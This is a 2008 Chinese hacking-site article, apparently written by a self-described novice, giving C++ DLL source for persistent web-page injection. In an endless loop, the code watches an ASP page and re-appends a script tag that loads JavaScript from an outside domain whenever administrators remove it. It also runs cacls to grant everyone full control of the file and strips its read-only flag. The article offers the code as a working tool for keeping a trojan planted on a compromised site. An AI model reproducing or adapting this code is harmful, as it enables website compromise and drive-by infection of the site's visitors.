简单监控文件挂马程序制作

作者：佚名文章来源：本站原创点击数：更新时间：2008-6-23

本人挂马语句经常被管理员KILL，但是自己也有管理员权限，保留的很好，既然被他发现了，怎么说我们也要强行挂上1天到2天，让他去重做系统去。下面是一个简单的监控某个文件，给予他访问的权限。然后在检查代码中有无我们事先插入的代码，没的话就插入，有的话，等等在

　　代码如下：

#include "stdafx.h"
#include "process.h"
#include "windows.h"
#include "string.h"
#include "iostream.h"
#include "fstream.h"
char path2[256]="E:\\gxm\\default.asp";
char guama[256]="\n<script language=javascript src='http://www.gxm520.cn/tg.js'></script>";
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                                         )
{
        switch ( ul_reason_for_call )
        {
                case DLL_PROCESS_ATTACH:
                {
                        while(1)
        {
ifstream ifs(path2);
char FileContent[5000];
memset(FileContent,0,5000);//初始化FileContent
ifs.read(FileContent,5000);//读取数据
ifs.close();//关闭ifstream对像
if(strstr(FileContent,guama)==0)
{
    char path1[256]="E:\\gxm\\default.asp ";      //比变量path2多了一个空格
        char mingling[256]="cacls ";
    strcat(mingling,path1);
    char ps[25]="/T /E /C /G everyone:F";
        strcat(mingling,ps);
    char mingling1[256]="cacls ";
        strcat(mingling1,path1);
        char pa[30]="/T /E /C /G administrator:F";
    strcat(mingling1,pa);
        system(mingling);
    system(mingling1);
        SetFileAttributes(path2,GetFileAttributes(path1) & ~FILE_ATTRIBUTE_READONLY);
    ofstream outfile;
        outfile.open(path2,ios::app);
        if (!outfile)
        {
                exit(0);
        }
outfile<<guama;
outfile.close();
}
Sleep(9000);
        }
                }
                default:
                        return TRUE;
        }
        return TRUE;
}

　　简单的监控文件程序的代码而已，我也不知道别人是怎么写的，反正自己是这样想出来一点一点的写点，希望对我们一样菜的人有点帮助。

上一篇文章：防火墙分类及应用

下一篇文章：传说中最安全的防火墙Comodo

相文内容：

用WinRAR解析木马的捆绑(图)
防火墙分类及应用
简单的3389入侵过程
PHP脚本木马的高级防范
最新方法帮你识隐藏木马
baidu搜索：简单监控文件挂马程序制作
Google搜索：搜索：简单监控文件挂马程序制作